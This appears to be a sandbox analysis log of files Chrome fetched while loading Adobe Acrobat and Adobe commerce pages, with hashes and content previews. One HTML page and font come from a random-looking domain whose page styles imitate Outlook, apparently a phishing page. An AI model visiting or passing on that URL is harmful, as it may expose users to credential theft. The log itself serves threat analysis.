                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[532],{93872:function(n,u,c){c.r(u)},78926:function(n,u,c){c.r(u)},27543:function(n,u,c){c.r(u)},67461:function(n,u,c){c.r(u)},69505:function(n,u,c){c.r(u)},49496:function(n,u,c){c.r(u)},29693:function(n,u,c){c.r(u)},43085:function(n,u,c){c.r(u)},14080:function(n,u,c){c.r(u)},22702:function(n,u,c){c.r(u)},91829:function(n,u,c){c.r(u)},95506:function(n,u,c){c.r(u)},80798:function(n,u,c){c.r(u)},9389:function(n,u,c){c.r(u)},57265:function(n,u,c){c.r(u)},41007:function(n,u,c){c.r(u)},69580:function(n,u,c){c.r(u)},73740:function(n,u,c){c.r(u)},78707:function(n,u,c){c.r(u)},95174:function(n,u,c){c.r(u)},65613:function(n,u,c){c.r(u)},67014:function(n,u,c){c.r(u)},56625:function(n,u,c){c.r(u)},21566:function(n,u,c){c.r(u)},17983:function(n,u,c){c.r(u)},60809:function(n,u,c){c.r(u)},64091:function(n,u,c){c.r(u)},59394:function(n,u,c){c.r(u)},32423:function(n,u,c){c.r(u)},57443:function(n,u,c){c.r(u)},1717:function(n,u,c){c.r(
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):28
                  Entropy (8bit):4.2359263506290326
                  Encrypted:false
                  SSDEEP:
                  MD5:F8DF06843903F2E5DE16508A866A47B3
                  SHA1:3F8109FE9C439F9D397FF8DA40723E5971641D9F
                  SHA-256:9B20744A7EEA50203B6F3506E0B37F29F5167A5DC020CC74573FE12198FE58C9
                  SHA-512:0BFE45EED50F1FA0D3C508EAE35976C01BB801C67ADE9716C2C87CF1B606369F33B2C01F514A4CF2A6DFA8743ED103329B7EA3E2DB3EEC89E8CE577867B69981
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCQLP6bhyuRyhEgUNGH6CWhIFDT9LpIMhl5QSQHkGu9M=?alt=proto
                  Preview:ChIKBw0YfoJaGgAKBw0/S6SDGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (17627)
                  Category:downloaded
                  Size (bytes):17675
                  Entropy (8bit):5.381387656900792
                  Encrypted:false
                  SSDEEP:
                  MD5:D9FDDFE5D2C3F4AF5D6BABB808AF699C
                  SHA1:228E1F9005C24BCE375325FCC2350D5516E75BE6
                  SHA-256:C9F486333E0A639F2FB9CF607C999BB755C75A8298500252EA02DD353184BE01
                  SHA-512:CBAE9062D35548B65CAEE08C78CF73BB7BC97A591DBAC704DC224825AC4E33987ADF974954CC35282D90F79687A9D6EBCE5F12A0DD6319B6584213F48DE8DDD3
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/google-yolo.js
                  Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[8644],{"2UxU":(e,t,o)=>{"use strict";o.d(t,{Z:()=>n});const n={ONE_TAP:"oneTap",BUTTON:"button",ONE_TAP_WITH_BUTTON:"oneTapWithButton"}},bcmf:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>R});var n=o("YWiy"),a=o("bF6B"),r=o.n(a),i=o("/hLX"),s=o.n(i),l=o("plsW"),c=o("PZ3W"),d=o.n(c),p=o("U8dO"),_=o("Hn3k"),u=o("YNPS");const triggerIMSLogin=async(e,t,o)=>{const n=new URLSearchParams;n.append("idp_token",e),n.append("state",t),n.append("device_id",r()()),n.append("provider_id","google"),n.append("scope",_.ug),n.append("accepted_tou_list","ADOBE_MASTER"),n.append("response_type","implicit_jump");try{const e=await fetch(`${l.envUtil.getEnvVar("ims_authorize_pac_uri")}?client_id=${l.envUtil.getEnvVar("dcweb_client_id")}`,{method:"post",body:n});return{result:{...await e.json()},ok:e.ok,status:e.status}}catch(n){if(o>0)return await new Promise((e=>setTimeout(e,1e3))),triggerIMSLogin(e,t,o-1);throw n}},utils_st
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (8059), with no line terminators
                  Category:downloaded
                  Size (bytes):8059
                  Entropy (8bit):5.175064822412142
                  Encrypted:false
                  SSDEEP:
                  MD5:5B564B6B2BAD64C079B2F732C14F5D6B
                  SHA1:0B88F36FD1300EBB5C213AB06C724096BABA95AD
                  SHA-256:880A1082BBBAAE33C34B2DBD7E928AAB3C47C34092A1B2B7EDD6FB892AF5A4EC
                  SHA-512:07E49E277811A0986EE3F50143C5C88836BA7A58B4DD796AB0CC4F5F642BC1DC197E27C80C88796FFE41C1E992AAC22C74FF7B15CEB797BC35F8891398975303
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/pages/analytics-a48341cfa418a0ea1471.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4583],{52694:function(e,t,r){"use strict";var n=r(61682);function o(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?o(Object(r),!0).forEach((function(t){n(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):o(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}t.default=function(e,t){var r=a.default,n={loading:function(e){e.error,e.isLoading;return e.pastDelay,null}};e instanceof Promise?n.loader=function(){return e}:"function"===typeof e?n.loader=e:"object"===typeof e&&(n=u(u({},n),e));var o=n=u(u({},n),t);if(o.suspense)throw new Error("Invalid suspense option usag
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):548
                  Entropy (8bit):4.660801881684815
                  Encrypted:false
                  SSDEEP:
                  MD5:4B074B0B59693FA9F94FB71B175FB187
                  SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                  SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                  SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                  Malicious:false
                  Reputation:unknown
                  Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (21536)
                  Category:downloaded
                  Size (bytes):21582
                  Entropy (8bit):5.395028158687135
                  Encrypted:false
                  SSDEEP:
                  MD5:61422CE5B7A4767DB7EC742D7928D2A4
                  SHA1:29071DB729C13D1A2AC09BAE76774CB712FE3E93
                  SHA-256:9963E1474D7B5D9C7819EEA20BF72114E4B5CFCA906C1C68194DC38DE0D8DB21
                  SHA-512:FD235095D6DB669D37F6D9FB361C449C435A263B206E19F71BEFD1A08F472CB1280B4B0BDC30012894DC396A69785EF51FEAAFEA190D507EBB65892EC5BF1036
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.95.0/bootstrap.js
                  Preview:(()=>{var e,r,t,n,o={ieSj:(e,r,t)=>{"use strict";t.d(r,{J:()=>getLouserzedMessage});var n=t("Zm2D"),o=t("plsW");const i=o.logging.getLogger("MessageUtil"),getLouserzedMessage=function(e,r){let a=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return new Promise((_=>{t.p=o.discovery.dropins[e].public_path;const c=o.locale2.getLocale();t("AWKe")(`./${c}.json`).then((e=>{const t=(0,n.createIntlCache)(),c=(0,n.createIntl)({locale:o.locale2.getLocale(),messages:e},t);e[r]?_(c.formatMessage({id:r},a)):(i.error(`No translation for ${r}`),_(""))}))}))}},z0w2:(e,r,t)=>{var n=t("YWiy");function DcIlluMetaphorBuildingPartnership(e){return n.createElement("svg",e,[n.createElement("path",{d:"m36.91587,26.87092c-.19702.52515-.40137,1.05249-.61499,1.59839-.21387.54614-.43726,1.09131-.66846,1.66089-.20386.48315-.40991.95923-.62061,1.43848-.21045.47949-.43018.95215-.65527,1.4248s-.45532.94238-.69287,1.40625c-.2373.46362-.48315.92676-.73682,1.38501-.75708.29956-1.72607.71436-2.76855,1.21436-1.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65387), with no line terminators
                  Category:downloaded
                  Size (bytes):78234
                  Entropy (8bit):5.617481957276762
                  Encrypted:false
                  SSDEEP:
                  MD5:73B81D3BF0E555DA815BC9921791E478
                  SHA1:344FA69771857B81A499652545CAD9C4E6714739
                  SHA-256:F16F5492835F08AD142C3F2684834FD70BFCCC65B73EE5D20AF0BF9633733304
                  SHA-512:970E996BCA254E074E85BBC3E869F95D54775569DF5D411BB44DC0F9CF054E3281D094E95AA0E021503002B6ED341FF8C999A2ECB95F01DBB1DFDC96757561B9
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/2455-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2455],{"2VSo":(e,t,n)=>{"use strict";t.E=function A4uHelpOutline(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M20.18127,25.932a1.83345,1.83345,0,0,1-1.95444,2.01521A1.86185,1.86185,0,0,1,16.27145,25.932a1.95513,1.95513,0,1,1,3.90982,0ZM17.95316,8.00006a9.23221,9.23221,0,0,0-4.5182,1.0724c-.11848.06278-.11848.1843-.11848.30683v2.97112a.14919.14919,0,0,0,.23709.12152,7.38464,7.38464,0,0,1,3.74491-1.00961c1.81265,0,2.52657.76556,2.52657,1.86834,0,.94987-.56506,1.5929-1.54518,2.60353C16.8533,17.40557,15.99052,18.323,15.99052,19.763a3.41737,3.41737,0,0,0,.71392,2.11441A.488.488,0,0,0,17.09038,22h2.58581a.13062.13062,0,0,0,.11861-.21469,3.3024,3.3024,0,0,1-.47557-1.68606c0-.91747,1.09987-1.92809,2.2591-3.06226a5.4743,5.4743,0,0,0,1.90214-4.2258C23.48047,10.11549,21.51909,8.00006,17.95316,8.00006ZM35,18A17,17,0,1,1,18,1.00
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65422), with no line terminators
                  Category:downloaded
                  Size (bytes):784999
                  Entropy (8bit):5.60454977035199
                  Encrypted:false
                  SSDEEP:
                  MD5:DB5A95B93D027735354E40A8CD508A06
                  SHA1:07712A5D65C9B7E021CB566A3886D5556EB38884
                  SHA-256:7DCDCEF2E0A0DF68D875693238F15CBBA930EE369192FF1BEDB9D696CFC46E6E
                  SHA-512:28F58E06E5AD68F4840D09907BD3A5B719FD1D84AD300A2E3CE9E2BA11C0762B0E7A5BD2F9BB83FDD0C27716B8B9AF1640F4A5F527A318838D81A52FEBB863FE
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-send-dropin/3.22.1_6.304.0/bootstrap.js
                  Preview:(()=>{var e,n,i,t,o={CTXV:(e,n,i)=>{"use strict";i.d(n,{UB:()=>t});Object.freeze({LIGHT:"light",DARK:"dark"}),Object.freeze({DEFAULT_LIGHT:{color:"var(--spectrum-global-color-gray-800)",background:"transparent"},DEFAULT_DARK:{color:"var(--spectrum-global-color-gray-700)",background:"transparent"},HOVER:{color:"var(--spectrum-global-color-gray-900)",background:"transparent"},ACTIVE:{color:"var(--spectrum-global-color-gray-900)",background:"var(--spectrum-global-color-gray-300)"},SELECTED:{color:"var(--spectrum-global-color-gray-900)",background:"var(--spectrum-global-color-gray-300)"}});const t=Object.freeze({DELAY:"500",PLACEMENT:Object.freeze({TOP:"top",BOTTOM:"bottom",LEFT:"left",RIGHT:"right"})})},klCL:function(e,n,i){var t;!function(o,s){"use strict";var r="function",a="undefined",d="object",l="string",_="major",c="model",m="name",p="type",u="vendor",h="version",f="architecture",g="console",b="mobile",k="tablet",v="smarttv",w="wearable",y="embedded",P="Amazon",S="Apple",D="ASUS",z=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                  Category:dropped
                  Size (bytes):1675576
                  Entropy (8bit):7.145958874314604
                  Encrypted:false
                  SSDEEP:
                  MD5:24E9BA18A247CBBB18C2D28C194E70FC
                  SHA1:26C3722246E9EFF0BF18140309A857D62C132FC2
                  SHA-256:CA029462765EE48ED805612182F7C9EB2DAFBB90183623DE443B7BBCED7F2B7B
                  SHA-512:4813BE98DCA8BB728466E4ED77A3237F2815BE17690EC84490D82D7880148F05AE10E9C3C99E12DC92A1C62E0DAD4E85A806BA1AC410254CFD25FB1160CE7B72
                  Malicious:false
                  Reputation:unknown
                  Preview:.asm.......dylink.0...`.......`......`.....`...`....`....`..`.....`.........`......`.......`.......`...........`........`..........`................`.................9.env._ZdlPv...env.strcmp...env.fiprintf...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc...env.fwrite...env.memcpy...env.strchr...env.strlen...env.memset...env._Znam...env.memmove...env._ZdaPv...env._Znwm...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm...envJ_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc...env.siprintf...envI_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEmc...env.fputs...env.__cxa_allocate_exception...env.__cxa_free_exception...env.__cxa_throw...env._ZNSt11logic_errorC2EPKc...envH_ZNKSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm...env.strncpy...env.memchr...env.memcmp...env._ZNSt20bad_array_new_lengthC1Ev...env.__stack_pointer....env.__memory_base....GOT.mem._ZN4CL
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (45459)
                  Category:downloaded
                  Size (bytes):45515
                  Entropy (8bit):5.362519651083345
                  Encrypted:false
                  SSDEEP:
                  MD5:DC5F1E5B13CBF6B23061A730E1749A9E
                  SHA1:25C1EE7832F0E53B63132D01195834FA02A31E77
                  SHA-256:3B9BDE7A05D9B3F4E66FE12DB458AD8024E106F7B7A3EF9FA9D3D1FE1893525B
                  SHA-512:6B622305B180BDA73691EAC6716CFF50CF23A37BE11F57A398C7B81AC7CDD0C7E9E826CEDE89784119FFEAFE8D2617D58AE4321BBA2FF979460F0D0F5A6944DC
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/lifecycle-bootstrap.js
                  Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[830],{wPbL:(e,t,o)=>{"use strict";o.d(t,{Z:()=>E});var s=o("YWiy"),i=o("Zm2D"),n=o("PZ3W"),r=o.n(n),a=o("plsW"),l=o("/hLX"),d=o.n(l),c=o("hy3F"),u=o("KqFk"),p=o("zEjh"),g=o("8ITD"),v=o("POro"),__awaiter=function(e,t,o,s){return new(o||(o=Promise))((function(i,n){function fulfilled(e){try{step(s.next(e))}catch(e){n(e)}}function rejected(e){try{step(s.throw(e))}catch(e){n(e)}}function step(e){e.done?i(e.value):function adopt(e){return e instanceof o?e:new o((function(t){t(e)}))}(e.value).then(fulfilled,rejected)}step((s=s.apply(e,t||[])).next())}))};const hooks_useLoadProviders=e=>{const[t,o]=(0,s.useState)([]),[i,n]=(0,s.useState)(!1);return(0,s.useEffect)((()=>{__awaiter(void 0,void 0,void 0,(function*(){const t=e.map((e=>a.providers[e]())),s=yield Promise.all(t);o(s),n(!0)}))}),[]),[t,i]};var h=o("ZEvA"),y=o("U8dO"),f=o("1IVy"),b=o("Kh11"),m=o.n(b);const AddFilesLink_AddFilesLink=e=>{let{className:t,dropi
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:dropped
                  Size (bytes):25216
                  Entropy (8bit):7.947339442168474
                  Encrypted:false
                  SSDEEP:
                  MD5:F9A795E2270664A7A169C73B6D84A575
                  SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                  SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                  SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                  Malicious:false
                  Reputation:unknown
                  Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):56
                  Entropy (8bit):4.3158230035695615
                  Encrypted:false
                  SSDEEP:
                  MD5:3E090E08D95EEECF3E3500335B6903AC
                  SHA1:585145AD697A1D80A591D499A3391B3D508C88D7
                  SHA-256:803B67EA86C7F9DE8043372B7D0C585EC0C7E06479EE79AE4D149E17A1A7D737
                  SHA-512:E1EBBB27EB7F77A8C4F938F88768A3AE5AE5976F9F7A003E2DD222904A441A4C22FD7E9D3DA8330DF775C3AB30A72E21E495B51DD603B859AA913E8A723D028E
                  Malicious:false
                  Reputation:unknown
                  Preview:{"error_code":"403000","message":"Api Key is required"}.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1801)
                  Category:downloaded
                  Size (bytes):1851
                  Entropy (8bit):5.058191588607331
                  Encrypted:false
                  SSDEEP:
                  MD5:0418575A982585E495AFD42C1FEE1CE7
                  SHA1:3F532AF23E522F178AE5A5A109BB780A9070042A
                  SHA-256:C3244A472500F35840E35827EA56DCE4AB1CB17069AEA34602F3EEB9A424218D
                  SHA-512:70B6D3E5107C8D99FBE10EED0AD4CA9200CB069B9FF577F2172FC81929C1DD48F085B68E29D2EEF69755DECDCB9D3D668FD7DB96B49096E58321C70F2D19DC8B
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/web-prefs-api.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[333],{"2uJW":(e,r,t)=>{"use strict";t.r(r),t.d(r,{default:()=>a});var i,s,n=t("abd3"),c=t("plsW");function _applyDecoratedDescriptor(e,r,t,i,s){var n={};return Object.keys(i).forEach((function(e){n[e]=i[e]})),n.enumerable=!!n.enumerable,n.configurable=!!n.configurable,("value"in n||n.initializer)&&(n.writable=!0),n=t.slice().reverse().reduce((function(t,i){return i(e,r,t)||t}),n),s&&void 0!==n.initializer&&(n.value=n.initializer?n.initializer.call(s):void 0,n.initializer=void 0),void 0===n.initializer&&(Object.defineProperty(e,r,n),n=null),n}let a=(_applyDecoratedDescriptor((i=class DCWebPrefsAPI{constructor(){!function _initializerDefineProperty(e,r,t,i){t&&Object.defineProperty(e,r,{enumerable:t.enumerable,configurable:t.configurable,writable:t.writable,value:t.initializer?t.initializer.call(i):void 0})}(this,"prefs",s,this),this.setPref=(e,r,t)=>this.user.getPreferences("dcweb").then((i=>{const s=i;s[e]||(s[e]={}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):150814
                  Entropy (8bit):5.89397164049737
                  Encrypted:false
                  SSDEEP:
                  MD5:BF59D520D169BCD8EEC4760DFAD16339
                  SHA1:92977A3279CB662A096F3F2B1891634863F2E51D
                  SHA-256:70AA3A43D09BC9E981F7A692CC401E73C20BC4A0757771A3E1ED68386B982164
                  SHA-512:78D20D75FC09C40994C4E50AE322AAF0CBC2EC98A6A97CEE59FAB41D3C196BD885162F09179E0DD8898839D085E00B69849ED22B35D3DF2BD2AE702ED26C8E8D
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/SAVMAEIXUVGWKJOGAmbcdidbjvshwcmlykdixjl01b1ects449v2i6glb?FBIHCRJAASLXEWVLWCQKQ
                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                  Category:downloaded
                  Size (bytes):35970
                  Entropy (8bit):7.989503040923577
                  Encrypted:false
                  SSDEEP:
                  MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                  SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                  SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                  SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/GDSherpa-bold.woff
                  Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65462)
                  Category:downloaded
                  Size (bytes):79096
                  Entropy (8bit):5.258341042706319
                  Encrypted:false
                  SSDEEP:
                  MD5:1A2BF03DF62DA46178288ED9219FCC4A
                  SHA1:2EB7541A13002C98977B6E3C003447691776CBA7
                  SHA-256:62D65C4B629E38D321C234FA2AD206F01312C04FD8D12DBA99BE314DF8E53830
                  SHA-512:152913087A81C9900525D3122F8F04A0908CF091CB9D55E42D7A0362C8692A8841D0A8302E37D80F459BE20FF07B048B82187766BFA89256707FE6C28CA693D8
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1389.1/cnpdfUtils-chunk.js
                  Preview:/*! For license information please see cnpdfUtils-chunk.js.LICENSE.txt */.(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[1454],{"1OO/":r=>{(()=>{"use strict";var C,W,at={60:(r,C,W)=>{W.d(C,{Dh:()=>c,Ee:()=>h,NC:()=>u,OR:()=>o,SK:()=>f,UD:()=>i,dK:()=>a,qJ:()=>p,rN:()=>s,vJ:()=>l});var at=W(832);function o(r){var C,W=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},at=arguments.length>2&&void 0!==arguments[2]?arguments[2]:"",it=!(arguments.length>3&&void 0!==arguments[3])||arguments[3],ct=W.childCb,st=W.componentCb,ut=r.components,lt=r.children,ht=r.path;C=ht?"".concat(at,"/").concat(ht):"".concat(at);var h=function(r){return r&&"function"==typeof r};Array.isArray(ut)&&h(st)&&ut.forEach((function(r){var W="".concat(C,"/").concat(r.path);st({component:r,absolutePath:W})})),Array.isArray(lt)&&lt.forEach((function(r){if(h(ct)){var at="".concat(C,"/").concat(r.path);ct({child:r,absolutePath:at})}it&&o(r,W,C,it)}))}function i(r,C){o(r,{componentCb:C},arguments.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (18494), with no line terminators
                  Category:downloaded
                  Size (bytes):18494
                  Entropy (8bit):5.313742591568661
                  Encrypted:false
                  SSDEEP:
                  MD5:39A6A2F1DD60B295C2D8EF74BA37F1CF
                  SHA1:364A55ECA44118C6549FBB2668B398735DDE00C3
                  SHA-256:8270E299768C3E2B3CB8BDAE5A551C2475FD71658801734F4EDCFE0F8D6FF64A
                  SHA-512:BF048661CA62961767A3CF8DCDB36D8531393A7CF23D188293FD4F1E877D18C9316AD0AB512CF8ACA7725BE13E70A29D175EDE9C9A13EC30508067B6E330718A
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/styles-6f6d0cb3afe2d000.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[532],{890092:function(n,t){t.Z={appMobileLargeMedia:"(max-width:1023px)",fontMedLgPlus:"undefined",ctaIcon:"ActionContainer__ctaIcon__cQBLM",actionContainer:"ActionContainer__actionContainer__MB2qH",removeCta:"ActionContainer__removeCta__q7B1p",hideBraintreePaypal:"ActionContainer__hideBraintreePaypal__b3xAK",showBraintreePaypal:"ActionContainer__showBraintreePaypal__dohKW",disabled:"ActionContainer__disabled__NvNOJ",buttonSecondary:"ActionContainer__buttonSecondary__yswui",buttonLarge:"ActionContainer__buttonLarge__j6mqJ",actionButton:"ActionContainer__actionButton__uJAgi"}},648074:function(n,t){t.Z={appMobileLargeMedia:"(max-width:1023px)",bundleDescription:"BundleDescription__bundleDescription__rr8rz"}},958945:function(n,t){t.Z={appMobileLargeMedia:"(max-width:1023px)",bundleSelectionContainer:"BundleSelection__bundleSelectionContainer__B0IZJ"}},202322:function(n,t){t.Z={backgroundColorBlack:"var(--spectrum-gray-9
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (19785)
                  Category:downloaded
                  Size (bytes):19980
                  Entropy (8bit):5.202488737891267
                  Encrypted:false
                  SSDEEP:
                  MD5:684695769CD20F5957491E5F7E393A05
                  SHA1:AEB2C911484F293EFBEC1E92EAB0631785714F39
                  SHA-256:84064B104120BEF77AAE098F78EC899DDD12B216A8A1A8BBDEAC559D7270E63A
                  SHA-512:014731B62A1EEC83060F0FD4847411F7E83056F255E4CCAB4C474B176EA1D9EC6F5DC5A770E586D7F5FDDB8C026F1290AF1005251E44FD77043143F2C291FD3A
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/AnalyticsProvider.d4f0229fb3d81dea2421.bundle.js
